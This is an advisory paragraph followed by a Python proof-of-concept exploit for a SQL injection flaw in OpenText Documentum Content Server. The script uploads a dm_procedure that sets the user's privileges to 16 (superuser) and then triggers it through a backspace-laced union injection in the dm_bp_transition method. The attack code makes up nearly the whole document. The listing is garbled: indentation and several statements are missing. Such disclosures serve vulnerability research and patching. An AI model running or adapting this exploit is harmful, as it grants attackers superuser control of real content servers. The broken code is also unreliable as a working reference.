OpenText Documentum Content Server has an inadequate protection mechanism against SQL injection, which allows remote authenticated users to execute arbitrary code with super-user privileges by leveraging the availability of the dm_bp_transition docbase method with a user-created dm_procedure object, as demonstrated by use of a backspace character in an injected string. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-2513. This code is a proof of concept exploit.
#!/usr/bin/env python
import socket
import sys
from os.path import basename
from dctmpy.docbaseclient import DocbaseClient
from dctmpy.obj.typedobject import TypedObject
def usage():
print "usage:\n\t%s host port user password" % basename(sys.argv[0])
def main():
if len(sys.argv) != 5:
(session, docbase) = create_session(*sys.argv[1:5])
if is_super_user(session):
print "Current user is a superuser, nothing to do"
install_owner = session.serverconfig['r_install_owner']
document_id = session.next_id(0x08)
content_id = session.next_id(0x06)
store = session.get_by_qualification("dm_store")
format = session.get_by_qualification("dm_format where name='crtext'")
handle = session.make_pusher(store['r_object_id'])
if handle < 1:
print "Unable to create pusher"
data = "Public Function EntryCriteria(ByVal SessionId As String,_" \
"\nByVal ObjectId As String,_" \
"\nByVal UserName As String,_" \
"\nByVal TargetState As String,_" \
"\nByRef ErrorString As String) As Boolean" \
"\nDim QueryID As String" \
"\nDim Query As String" \
"\nQuery = \"query,c,update dm_user objects set " \
"user_privileges=16 where user_name=\'%s\'\"" \
"\nQueryID = dmAPIGet(Query)" \
"\nQueryID = dmAPIExec(\"commit,c\")" \
"\nEntryCriteria=True" \
"\nEnd Function" % (sys.argv[3])
b = bytearray()
if not session.start_push(handle, content_id, format['r_object_id'], len(b)):
print "Failed to start push"
session.upload(handle, b)
data_ticket = session.end_push_v2(handle)['DATA_TICKET']
procedure = False
print "Trying to create dm_procedure"
document = TypedObject(session=session)
document.set_string("OBJECT_TYPE", "dm_procedure")
document.set_bool("IS_NEW_OBJECT", True)
document.set_int("i_vstamp", 0)
document.set_int("world_permit", 7)
document.set_string("object_name", "CVE-2014-2513")
document.set_string("r_object_type", "dm_procedure")
document.append_id("i_contents_id", content_id)
document.set_int("r_page_cnt", 1)
document.set_string("a_content_type", format['name'])
document.set_bool("i_has_folder", True)
document.set_bool("i_latest_flag", True)
document.set_id("i_chronicle_id", document_id)
document.append_string("r_version_label", ["1.0", "CURRENT"])
document.set_int("r_content_size", len(b))
if session.sys_obj_save(document_id, document):
procedure = True
except Exception, e:
print str(e)
if not procedure:
print "Failed to create dm_procedure"
print "Trying to create dm_sysobject"
document = TypedObject(session=session)
document.set_string("OBJECT_TYPE", "dm_sysobject")
document.set_bool("IS_NEW_OBJECT", True)
document.set_int("i_vstamp", 0)
document.set_string("owner_name", sys.argv[3])
document.set_int("world_permit", 7)
document.set_string("object_name", "CVE-2017-7221")
document.set_string("r_object_type", "dm_sysobject")
document.append_id("i_contents_id", content_id)
document.set_int("r_page_cnt", 1)
document.set_string("a_content_type", format['name'])
document.set_bool("i_has_folder", True)
document.set_bool("i_latest_flag", True)
document.set_id("i_chronicle_id", document_id)
document.append_string("r_version_label", ["1.0", "CURRENT"])
document.set_int("r_content_size", len(b))
if not session.sys_obj_save(document_id, document):
print "Failed to create dm_sysobject"
content = TypedObject(session=session)
content.set_string("OBJECT_TYPE", "dmr_content")
content.set_bool("IS_NEW_OBJECT", True)
content.set_id("storage_id", store['r_object_id'])
content.set_id("format", format['r_object_id'])
content.set_int("data_ticket", data_ticket)
content.set_id("parent_id", document_id)
content.set_int("page", 0)
content.set_string("full_format", format['name'])
content.set_int("content_size", len(b))
if not session.save_cont_attrs(content_id, content):
print "Failed to create content"
if procedure:
query = "execute do_method WITH METHOD='dm_bp_transition'," \
" ARGUMENTS='%s %s %s \"\" 0000000000000000 " \
"0000000000000000 0000000000000000 \"%s\" " \
"0000000000000000 0000000000000000 0000000000000000 " \
"\"\" 0 0 T F T T %s %s'" % \
(docbase, docbase, install_owner, document_id,
install_owner, session.session)
query = "execute do_method WITH METHOD='dm_bp_transition'," \
" ARGUMENTS='%s %s %s \"\" 0000000000000000 " \
"0000000000000000 0000000000000000 \"%s,'' " \
"union\b select r_object_id from dm_sysobject(all) where r_object_id=''%s\" " \
"0000000000000000 0000000000000000 0000000000000000 " \
"\"\" 0 0 T F T T %s %s'" % \
(docbase, docbase, install_owner, document_id,
document_id, install_owner, session.session)
r = session.query(
"select user_privileges from dm_user "
"where user_name=USER") \
if r != 16:
print "Failed"
print "P0wned!"
def create_session(host, port, user, pwd, identity=None):
print "Trying to connect to %s:%s as %s ..." % \
(host, port, user)
session = None
session = DocbaseClient(
host=host, port=int(port),
username=user, password=pwd,
except socket.error, e:
if e.errno == 54:
session = DocbaseClient(
host=host, port=int(port),
username=user, password=pwd,
secure=True, ciphers=CIPHERS)
raise e
docbase = session.docbaseconfig['object_name']
version = session.serverconfig['r_server_version']
print "Connected to %s:%s, docbase: %s, version: %s" % \
(host, port, docbase, version)
return (session, docbase)
def is_super_user(session):
user = session.get_by_qualification(
"dm_user WHERE user_name=USER")
if user['user_privileges'] == 16:
return True
group = session.get_by_qualification(
"dm_group where group_name='dm_superusers' "
"AND any i_all_users_names=USER")
if group is not None:
return True
return False
if __name__ == '__main__':